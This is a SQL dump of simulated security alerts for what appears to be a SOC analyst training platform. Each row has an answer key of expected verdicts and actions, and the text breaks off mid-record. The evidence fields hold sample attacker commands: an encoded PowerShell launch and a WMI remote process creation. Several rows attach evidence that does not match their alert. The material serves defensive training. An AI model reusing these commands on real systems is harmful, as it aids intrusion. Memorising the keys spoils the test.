(838, 'Failed Brute Force Login Attempts Detected from External IP', 'medium', 'Linux Server', 'Multiple failed login attempts detected from an external IP, indicating a potential brute force attack.', 'Brute Force', 'T1110', 0, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T16:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.100\",\"dst_ip\":\"192.168.1.55\",\"username\":\"admin\",\"hostname\":\"web-server\",\"failed_attempts\":25}', '2026-01-14 15:19:37', '2026-02-22 15:15:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The volume and pattern of failed attempts suggest a brute force attack from a known malicious IP. Before applying block_ip, reconcile the source address: the attached auth.log lines show the failures coming from 192.168.1.50 (an internal address) while the alert names 203.0.113.100, and blocking the wrong one either misses the attacker or cuts off an internal host. Also check whether any successful authentication for admin followed the failures, which determines whether reset_credentials is required or precautionary.\"}', 'Intermediate', 'SIEM', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.499Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"dst_ip\\\":\\\"192.168.1.55\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.499Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 
192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"dst_ip\\\":\\\"192.168.1.55\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.499Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"dst_ip\\\":\\\"192.168.1.55\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.499Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"dst_ip\\\":\\\"192.168.1.55\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.499Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"dst_ip\\\":\\\"192.168.1.55\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(839, 'Unauthorized Port Scan Detected from Internal IP', 'low', 'Firewall', 'An internal IP was detected performing port scans across the network, likely an internal security test.', 'Suspicious Activity', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-01-14T18:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.101\",\"username\":\"security_test\",\"hostname\":\"security-scanner\"}', '2026-01-14 15:19:37', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\",\"analysis_notes\":\"The activity matches the profile of an internal security scan, not a malicious attack. Before closing as a false positive, confirm the scan was authorized (a change ticket or scanner allowlist entry for 192.168.1.100 covering this time window): the hostname security-scanner and the username security_test are labels an attacker can choose, and the internal verdict from Pattern Analysis only confirms the address range.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(840, 'High Volume of DNS Requests Detected from Internal IP', 'low', 'DNS Server', 'A significant number of DNS requests were observed from an internal IP, likely due to a misconfigured system.', 'Anomaly', 'T1071', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-14T20:15:30Z\",\"event_type\":\"dns_request\",\"src_ip\":\"192.168.2.30\",\"dst_ip\":\"8.8.8.8\",\"hostname\":\"misconfigured-device\"}', '2026-01-14 15:19:37', '2026-02-17 05:27:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"8.8.8.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Public DNS server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"anomaly\",\"analysis_notes\":\"The high volume of DNS requests is likely due to a misconfigured internal device, not a security threat.\"}', 'Intermediate', 'CORE', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.501Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T20:15:30Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"8.8.8.8\\\",\\\"hostname\\\":\\\"misconfigured-device\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.501Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T20:15:30Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"8.8.8.8\\\",\\\"hostname\\\":\\\"misconfigured-device\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.501Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T20:15:30Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"8.8.8.8\\\",\\\"hostname\\\":\\\"misconfigured-device\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.501Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T20:15:30Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"8.8.8.8\\\",\\\"hostname\\\":\\\"misconfigured-device\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.501Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T20:15:30Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"8.8.8.8\\\",\\\"hostname\\\":\\\"misconfigured-device\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(841, 'Ransomware Detected - LockBit 3.0 Encryption Activity', 'critical', 'CrowdStrike', 'CrowdStrike detected a ransomware encryption activity involving LockBit 3.0 on an internal host. Evidence of encrypted files and ransom note found.', 'Malware', 'T1486', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T03:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"203.0.113.10\",\"username\":\"jdoe\",\"hostname\":\"GOV-WS123\",\"command_line\":\"C:\\\\Program Files\\\\LockBit\\\\encrypt.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\"}', '2026-01-14 15:21:38', '2026-02-16 17:57:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address indicating the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\LockBit\\\\encrypt.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known LockBit 3.0 ransomware executable.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with LockBit 3.0 ransomware.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"LockBit 3.0 ransomware activity confirmed by malicious file hash and command line execution.\"}', 'Beginner', 'EDR', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(842, 'Cobalt Strike Beacon Detected from External IP', 'high', 'Splunk', 'A Cobalt Strike beacon was detected connecting to an external IP, indicating potential command and control activity.', 'Malware', 'T1105', 1, 'investigating', 174, '{\"timestamp\":\"2026-01-14T10:20:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.5\",\"username\":\"svc_account\",\"hostname\":\"GOV-SERVER01\",\"command_line\":\"c:\\\\windows\\\\system32\\\\net.exe use\"}', '2026-01-14 15:21:38', '2026-02-26 04:49:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks and C2 activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal server IP associated with the suspicious network activity.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"External IP associated with known C2 activity confirmed as malicious, indicating a potential breach. Caveat: the raw log records 203.0.113.45 as the source and 10.0.0.5 as the destination, which is an inbound connection, whereas a beacon is outbound from the compromised host, and the only command shown (net.exe use) is not beacon evidence. Confirm the flow direction from the network telemetry before settling on the technique mapping, since C2 beaconing normally falls under Command and Control (for example T1071) rather than T1105 Ingress Tool Transfer.\"}', 'Beginner', 'NDR', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.503Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T10:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_account\\\",\\\"hostname\\\":\\\"GOV-SERVER01\\\",\\\"command_line\\\":\\\"c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\net.exe 
use\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.503Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T10:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_account\\\",\\\"hostname\\\":\\\"GOV-SERVER01\\\",\\\"command_line\\\":\\\"c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\net.exe use\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.503Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T10:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_account\\\",\\\"hostname\\\":\\\"GOV-SERVER01\\\",\\\"command_line\\\":\\\"c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\net.exe use\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.503Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T10:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_account\\\",\\\"hostname\\\":\\\"GOV-SERVER01\\\",\\\"command_line\\\":\\\"c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\net.exe use\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.503Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T10:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_account\\\",\\\"hostname\\\":\\\"GOV-SERVER01\\\",\\\"command_line\\\":\\\"c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\net.exe use\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(843, 'Phishing Email with Malicious URL', 'medium', 'Proofpoint', 'A phishing email impersonating a government official was detected, containing a malicious URL leading to credential harvesting site.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T08:15:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.22\",\"dst_ip\":\"192.168.1.101\",\"email_sender\":\"gov-official@phishingsite.com\",\"hostname\":\"GOV-MAIL01\",\"url\":\"http://malicious-site.com/login\"}', '2026-01-14 15:21:38', '2026-02-16 16:56:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with multiple phishing attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL leads to a credential harvesting site.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"gov-official@phishingsite.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain known for phishing activities.\"}}],\"expected_actions\":[\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contained a malicious URL linked to a phishing site, confirmed by external OSINT.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious URL\",\"date\":\"2026-02-01T20:32:22.504Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(844, 'Failed Brute Force Login Attempts', 'medium', 'Wazuh', 'Multiple failed login attempts detected on an internal server, originating from a foreign IP address.', 'Brute Force', 'T1110', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-14T06:50:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"192.168.1.200\",\"username\":\"admin\",\"hostname\":\"GOV-APP01\",\"failed_attempts\":30}', '2026-01-14 15:21:38', '2026-03-03 12:16:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for multiple brute force attempts globally.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Common username targeted in brute force attacks.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The foreign IP address is associated with malicious activities, as confirmed by OSINT.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.505Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T06:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GOV-APP01\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-02-01T20:31:22.505Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T06:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GOV-APP01\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-02-01T20:30:22.505Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T06:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GOV-APP01\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-02-01T20:29:22.505Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T06:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GOV-APP01\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-02-01T20:28:22.505Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T06:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GOV-APP01\\\",\\\"failed_attempts\\\":30}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(845, 'Suspicious WMI Activity Detected', 'high', 'Firewall', 'Suspicious WMI activity detected originating from a compromised host attempting lateral movement within the network.', 'Lateral Movement', 'T1047', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T04:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.70\",\"username\":\"malicioususer\",\"hostname\":\"GOV-SERVER02\",\"command_line\":\"wmic /node:192.168.1.70 process call create calc.exe\"}', '2026-01-14 15:21:38', '2026-02-16 05:11:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.70\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Target internal IP address for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"wmic /node:192.168.1.70 process call create calc.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"WMI command used for lateral movement.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Suspicious WMI command execution indicates lateral movement activity.\"}', 'Beginner', 'EDR', 3, 1, 'GOVERNMENT', NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(846, 'False Positive - Regular User Login', 'low', 'Splunk', 'A login attempt flagged as suspicious due to multiple location changes but verified as legitimate user activity.', 'Credential Access', 'T1078', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-14T09:15:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"8.8.8.8\",\"dst_ip\":\"192.168.1.102\",\"username\":\"jane.smith\",\"hostname\":\"GOV-LAPTOP01\"}', '2026-01-14 15:21:38', '2026-02-18 09:08:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"8.8.8.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported for this IP.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jane.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate user account confirmed.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_access\",\"analysis_notes\":\"User login verified as legitimate after review of travel schedule and access logs. Two items should be reconciled before closing: 8.8.8.8 is a public DNS resolver address, not a plausible client source for an interactive user login (check for a proxy or logging misconfiguration that rewrites the source), and the attached auth.log evidence shows failed SSH logins for admin from 192.168.1.50 rather than the successful jane.smith login this alert describes.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.507Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 